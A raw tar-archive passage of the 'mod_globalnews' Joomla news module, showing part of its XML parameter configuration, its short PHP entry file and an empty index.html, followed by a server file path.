name="border" type="text" default="1px solid #EFEFEF" label="Border" description="Border (1px solid #EFEFEF)" /> <field name="header_color" type="text" default="#EFEFEF" label="Header Bgcolor" description="Header Background Color" /> <field name="header_padding" type="text" default="5px" label="Header Padding" description="Category Header Padding" /> <field name="height" type="text" default="100px" label="Content Area Height" description="Specify px, em or %" /> <field name="color" type="text" default="#FFFFFF" label="Content Area Bgcolor" description="Content Area Background Color" /> <field name="padding" type="text" default="5px" label="Content Area Padding" description="Padding" /> <field name="delay" type="text" default="3000" label="Scroller/Slider Delay" description="Scroller/Slide Delay (ms)" /> <field name="next" type="radio" class="btn-group" default="0" label="Slider NEXT link" description="Show/Hide NEXT link in slider pagination" > <option value="1">Show</option> <option value="0">Hide</option> </field> <field name="filteringspacer3" type="spacer" hr="true" /> <field name="html" type="textarea" filter="raw" cols="38" rows="10" default="GN_image GN_title <br /> <small>GN_date</small> <br /> GN_text GN_readmore" label="HTML Supported Code for Content Layouts. <br />FEATURED ELEMENTS: <br />GN_image <br />GN_title <br />GN_text <br />GN_author <br />GN_date <br />GN_readmore <br />GN_hits_label <br />GN_hits_value" description="Insert any HTML code between the default elements" /> <field name="limittext" type="text" default="150" label="Text Chars Limit" description="Article's Text Characters Limit (0 means no limit)" /> <field name="striptext" type="radio" class="btn-group" default="1" label="Strip Tags?" description="Strip HTML tags from your Articles intro (full) text (Selecting No could cause an HTML mess-up)"> <option value="1">Yes</option> <option value="0">No</option> </field> <field name="allowedtags" type="text" filter="raw" default="" label="Allowed Tags" description="If you choose to Strip Tags, you can write here down those tags you would like to keep" /> <field name="date_format" type="text" default="" label="Date Format" description="Optional format for strftime, or leave blank for a formated date according to current local" /> <field name="date" type="radio" class="btn-group" default="created" label="Selected Date" description="Selected Date"> <option value="created">Created</option> <option value="modified">Modified</option> </field> <field name="item_img_align" type="list" default="left" label="Article Image Align" description="Left/Right"> <option value="left">Left</option> <option value="right">Right</option> <option value="center">Center</option> </field> <field name="item_img_width" type="text" default="90" label="Article Image Width" description="Article Image Width (px), or leave blank for a proportional width" /> <field name="item_img_height" type="text" default="90" label="Article Image Height" description="Article Image Height (px), or leave blank for a proportional height" /> <field name="item_img_margin" type="text" default="3px" label="Article Image Margin" description="Article Image Margin" /> <field name="item_img_border" type="text" default="0" label="Article Image Border" description="Article Image Border" /> <field name="thumb_image" type="radio" class="btn-group" default="1" label="Create Thumbs" description="Auto create and display thumbs from the article images" > <option value="1">JYES </option> <option value="0">JNO </option> </field> <field name="thumb_proportions" type="list" default="bestfit" label="Porportions" description="Porportions" > <option value="bestfit">Best fit keep proportions</option> <option value="crop">Crop to fit (cut one side)</option> <option value="only_cut">Crop to fit (cut both sides)</option> <option value="fill">Fill out with background color</option> <option value="transparent">Fill out with transparent background</option> <!--<option value="stretch">MOD_FEATCATS_OPTION_PROP_STRECH</option>--> </field> <field name="thumb_bg" type="text" default="#FFFFFF" label="Background" description="Background color to fill out the thumb Applies only if 'Fill out with background/transparent color' is selected above" /> <field name="thumb_type" type="list" default="" label="Image type" description="Image type of generated images" > <option value="">preserve</option> <option value="png">PNG</option> <option value="gif">GIF</option> <option value="jpeg">JPG</option> </field> <field name="author" type="list" default="username" label="Author" description="Author"> <option value="username">Username</option> <option value="name">Name</option> <option value="alias">Alias</option> </field> </fieldset> <fieldset name="advanced"> <field name="cache" type="list" default="0" label="Caching" description="Select whether to cache the content of this module"> <option value="0">No caching</option> <option value="1">Use global</option> </field> <field name="cache_time" type="text" default="900" label="Cache Time" description="The time before the module is recached" /> <field name="moduleclass_sfx" type="text" default="" label="Module Class Suffix" description="PARAMMODULECLASSSUFFIX" /> </fieldset> </fields> </config> </extension> mod_globalnews.php000060400000002414151652221530010250 0ustar00<?php /*------------------------------------------------------------------------ # mod_globalnews - Global News Module # ------------------------------------------------------------------------ # author Joomla!Vargas # copyright Copyright (C) 2010 joomla.vargas.co.cr. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://joomla.vargas.co.cr # Technical Support: Forum - http://joomla.vargas.co.cr/forum -------------------------------------------------------------------------*/ // no direct access defined('_JEXEC') or die; //require_once __DIR__ . '/helper.php'; require_once dirname(__FILE__) . '/helper.php'; global $globalnews_id; if ( !$globalnews_id ) : $globalnews_id = 1; endif; $cat = modGlobalNewsHelper::getGN_Cats($params); $total = count ( $cat ); $cols = $params->get( 'cols', 1 ); $empty = $params->get( 'empty', 0 ); $layout = $params->get( 'layout', 'list' ); $show_cat = $params->get( 'show_cat', 1 ); $width = $params->get( 'width', 'auto' ); if ( $width == 'auto' ) : $width = 100/$cols . '%'; endif; modGlobalNewsHelper::addGN_CSS($params, $layout, $globalnews_id, $total); require(JModuleHelper::getLayoutPath('mod_globalnews')); $globalnews_id++;index.html000060400000000054151652221530006536 0ustar00<html><body bgcolor="#FFFFFF"></body></html>
/home/opticamezl/www/newok/api/../mod_globalnews.tar